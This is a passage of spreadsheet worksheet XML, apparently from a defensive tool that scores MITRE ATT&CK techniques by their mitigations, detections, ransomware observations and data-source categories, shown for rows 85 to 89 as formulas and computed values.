        <f>SUM(H85,M85,V85)*(1+SUM(AE85,AG85,AI85,AK85,AM85))</f>
        <v>0.2631926695666667</v>
      </c>
      <c r="C85" s="25" t="s">
        <v>421</v>
      </c>
      <c r="D85" s="25" t="s">
        <v>422</v>
      </c>
      <c r="E85" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F85" s="51">
        <v>1</v>
      </c>
      <c r="G85" s="51">
        <v>1</v>
      </c>
      <c r="H85" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I85">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J85">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K85">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L85">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M85" s="44">
        <v>2.6511299999999998E-3</v>
      </c>
      <c r="N85" s="51">
        <v>0</v>
      </c>
      <c r="O85" s="51">
        <v>4</v>
      </c>
      <c r="P85" s="51">
        <v>1</v>
      </c>
      <c r="Q85" s="51">
        <v>3</v>
      </c>
      <c r="R85" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S85" s="51">
        <v>3</v>
      </c>
      <c r="T85" s="51" t="s">
        <v>247</v>
      </c>
      <c r="U85" s="51">
        <v>3</v>
      </c>
      <c r="V85" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="W85">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X85">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y85">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z85">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA85">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB85">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC85" s="29" t="s">
        <v>424</v>
      </c>
      <c r="AD85" s="25" t="str" cm="1">
        <f t="array" ref="AD85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC85)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE85" s="25">
        <f>IF(AD85="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF85" s="25" t="str" cm="1">
        <f t="array" ref="AF85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC85)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG85" s="25">
        <f>IF(AF85="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH85" s="25" t="str" cm="1">
        <f t="array" ref="AH85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC85)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI85" s="25">
        <f>IF(AH85="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ85" s="25" t="str" cm="1">
        <f t="array" ref="AJ85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC85)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK85" s="25">
        <f>IF(AJ85="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL85" s="25" t="str" cm="1">
        <f t="array" ref="AL85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC85)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM85" s="25">
        <f>IF(AL85="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN85" s="52">
        <v>3</v>
      </c>
      <c r="AO85" s="51">
        <v>1</v>
      </c>
      <c r="AP85" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12631926695666668</v>
      </c>
      <c r="AQ85" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7730889855555563E-2</v>
      </c>
      <c r="AR85" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.7730889855555563E-2</v>
      </c>
      <c r="AS85" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT85" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU8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86" spans="1:47" ht="32.1">
      <c r="A86" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.32261763335580951</v>
      </c>
      <c r="B86" s="25">
        <f>SUM(H86,M86,V86)*(1+SUM(AE86,AG86,AI86,AK86,AM86))</f>
        <v>1.2261763335580953</v>
      </c>
      <c r="C86" s="25" t="s">
        <v>425</v>
      </c>
      <c r="D86" s="25" t="s">
        <v>426</v>
      </c>
      <c r="E86" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F86" s="51">
        <v>1</v>
      </c>
      <c r="G86" s="51">
        <v>1</v>
      </c>
      <c r="H86" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I86">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J86">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K86">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L86">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M86" s="44">
        <v>2.2422599999999998E-3</v>
      </c>
      <c r="N86" s="51">
        <v>0</v>
      </c>
      <c r="O86" s="51">
        <v>108</v>
      </c>
      <c r="P86" s="51">
        <v>15</v>
      </c>
      <c r="Q86" s="51">
        <v>6</v>
      </c>
      <c r="R86" s="52" t="s">
        <v>427</v>
      </c>
      <c r="S86" s="51">
        <v>24</v>
      </c>
      <c r="T86" s="51" t="s">
        <v>428</v>
      </c>
      <c r="U86" s="51">
        <v>29</v>
      </c>
      <c r="V86" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.98095238095238091</v>
      </c>
      <c r="W86">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>53</v>
      </c>
      <c r="X86">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.96363636363636362</v>
      </c>
      <c r="Y86">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.96363636363636362</v>
      </c>
      <c r="Z86">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>129</v>
      </c>
      <c r="AA86">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>1.29</v>
      </c>
      <c r="AB86">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AC86" s="29" t="s">
        <v>429</v>
      </c>
      <c r="AD86" s="25" t="str" cm="1">
        <f t="array" ref="AD86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE86" s="25">
        <f>IF(AD86="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF86" s="25" t="str" cm="1">
        <f t="array" ref="AF86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC86)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG86" s="25">
        <f>IF(AF86="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH86" s="25" t="str" cm="1">
        <f t="array" ref="AH86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC86)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI86" s="25">
        <f>IF(AH86="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ86" s="25" t="str" cm="1">
        <f t="array" ref="AJ86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK86" s="25">
        <f>IF(AJ86="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL86" s="25" t="str" cm="1">
        <f t="array" ref="AL86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM86" s="25">
        <f>IF(AL86="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN86" s="60">
        <v>6</v>
      </c>
      <c r="AO86" s="51">
        <v>1</v>
      </c>
      <c r="AP86" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.32261763335580951</v>
      </c>
      <c r="AQ86" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.4087254445193651</v>
      </c>
      <c r="AR86" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.4087254445193651</v>
      </c>
      <c r="AS86" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT86" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU8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87" spans="1:47" ht="32.1">
      <c r="A87" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18064523605999999</v>
      </c>
      <c r="B87" s="25">
        <f>SUM(H87,M87,V87)*(1+SUM(AE87,AG87,AI87,AK87,AM87))</f>
        <v>1.1397856939333333</v>
      </c>
      <c r="C87" s="25" t="s">
        <v>430</v>
      </c>
      <c r="D87" s="25" t="s">
        <v>431</v>
      </c>
      <c r="E87" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F87" s="51">
        <v>5</v>
      </c>
      <c r="G87" s="51">
        <v>2</v>
      </c>
      <c r="H87" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I87">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J87">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K87">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L87">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M87" s="44">
        <v>2.21982E-3</v>
      </c>
      <c r="N87" s="51">
        <v>1</v>
      </c>
      <c r="O87" s="51">
        <v>15</v>
      </c>
      <c r="P87" s="51">
        <v>10</v>
      </c>
      <c r="Q87" s="51">
        <v>14</v>
      </c>
      <c r="R87" s="52" t="s">
        <v>298</v>
      </c>
      <c r="S87" s="51">
        <v>8</v>
      </c>
      <c r="T87" s="51" t="s">
        <v>432</v>
      </c>
      <c r="U87" s="51">
        <v>25</v>
      </c>
      <c r="V87" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.50476190476190474</v>
      </c>
      <c r="W87">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X87">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y87">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z87">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>40</v>
      </c>
      <c r="AA87">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.4</v>
      </c>
      <c r="AB87">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="AC87" s="29" t="s">
        <v>433</v>
      </c>
      <c r="AD87" s="25" t="str" cm="1">
        <f t="array" ref="AD87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC87)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE87" s="25">
        <f>IF(AD87="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF87" s="25" t="str" cm="1">
        <f t="array" ref="AF87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC87)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG87" s="25">
        <f>IF(AF87="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH87" s="25" t="str" cm="1">
        <f t="array" ref="AH87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC87)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI87" s="25">
        <f>IF(AH87="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ87" s="25" t="str" cm="1">
        <f t="array" ref="AJ87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC87)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK87" s="25">
        <f>IF(AJ87="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL87" s="25" t="str" cm="1">
        <f t="array" ref="AL87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC87)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM87" s="25">
        <f>IF(AL87="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN87" s="60">
        <v>2</v>
      </c>
      <c r="AO87" s="51">
        <v>1</v>
      </c>
      <c r="AP87" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18064523605999999</v>
      </c>
      <c r="AQ87" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.37992856464444441</v>
      </c>
      <c r="AR87" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.37992856464444441</v>
      </c>
      <c r="AS87" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT87" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU8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88" spans="1:47" ht="63.95">
      <c r="A88" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10514322241999999</v>
      </c>
      <c r="B88" s="25">
        <f>SUM(H88,M88,V88)*(1+SUM(AE88,AG88,AI88,AK88,AM88))</f>
        <v>0.71809889086666667</v>
      </c>
      <c r="C88" s="25" t="s">
        <v>434</v>
      </c>
      <c r="D88" s="25" t="s">
        <v>435</v>
      </c>
      <c r="E88" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F88" s="51">
        <v>1</v>
      </c>
      <c r="G88" s="51">
        <v>1</v>
      </c>
      <c r="H88" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I88">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J88">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K88">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L88">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M88" s="44">
        <v>1.8287399999999999E-3</v>
      </c>
      <c r="N88" s="51">
        <v>0</v>
      </c>
      <c r="O88" s="51">
        <v>17</v>
      </c>
      <c r="P88" s="51">
        <v>6</v>
      </c>
      <c r="Q88" s="51">
        <v>3</v>
      </c>
      <c r="R88" s="52" t="s">
        <v>436</v>
      </c>
      <c r="S88" s="51">
        <v>10</v>
      </c>
      <c r="T88" s="51" t="s">
        <v>437</v>
      </c>
      <c r="U88" s="51">
        <v>23</v>
      </c>
      <c r="V88" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.43809523809523809</v>
      </c>
      <c r="W88">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X88">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y88">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z88">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>26</v>
      </c>
      <c r="AA88">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.26</v>
      </c>
      <c r="AB88">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.26</v>
      </c>
      <c r="AC88" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD88" s="25" t="str" cm="1">
        <f t="array" ref="AD88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC88)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE88" s="25">
        <f>IF(AD88="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF88" s="25" t="str" cm="1">
        <f t="array" ref="AF88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC88)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG88" s="25">
        <f>IF(AF88="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH88" s="25" t="str" cm="1">
        <f t="array" ref="AH88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC88)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI88" s="25">
        <f>IF(AH88="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ88" s="25" t="str" cm="1">
        <f t="array" ref="AJ88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC88)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK88" s="25">
        <f>IF(AJ88="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL88" s="25" t="str" cm="1">
        <f t="array" ref="AL88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC88)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM88" s="25">
        <f>IF(AL88="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN88" s="59">
        <v>1</v>
      </c>
      <c r="AO88" s="51">
        <v>1</v>
      </c>
      <c r="AP88" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10514322241999999</v>
      </c>
      <c r="AQ88" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.23936629695555556</v>
      </c>
      <c r="AR88" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.23936629695555556</v>
      </c>
      <c r="AS88" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT88" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU8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89" spans="1:47" ht="48">
      <c r="A89" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.8562967080190481E-2</v>
      </c>
      <c r="B89" s="25">
        <f>SUM(H89,M89,V89)*(1+SUM(AE89,AG89,AI89,AK89,AM89))</f>
        <v>0.98562967080190478</v>
      </c>
      <c r="C89" s="25" t="s">
        <v>438</v>
      </c>
      <c r="D89" s="25" t="s">
        <v>439</v>
      </c>
      <c r="E89" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F89" s="51">
        <v>1</v>
      </c>
      <c r="G89" s="51">
        <v>6</v>
      </c>
      <c r="H89" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I89">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J89">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K89">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.6</v>
      </c>
      <c r="L89">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="M89" s="44">
        <v>1.64997E-3</v>
      </c>
      <c r="N89" s="51">
        <v>0</v>
      </c>
      <c r="O89" s="51">
        <v>1</v>
      </c>
      <c r="P89" s="51">
        <v>0</v>
      </c>
      <c r="Q89" s="51">
        <v>2</v>
      </c>
      <c r="R89" s="52" t="s">
        <v>440</v>
      </c>
      <c r="S89" s="51">
        <v>29</v>
      </c>
      <c r="T89" s="51" t="s">
        <v>441</v>
      </c>
      <c r="U89" s="51">
        <v>24</v>
      </c>
      <c r="V89" s="25">
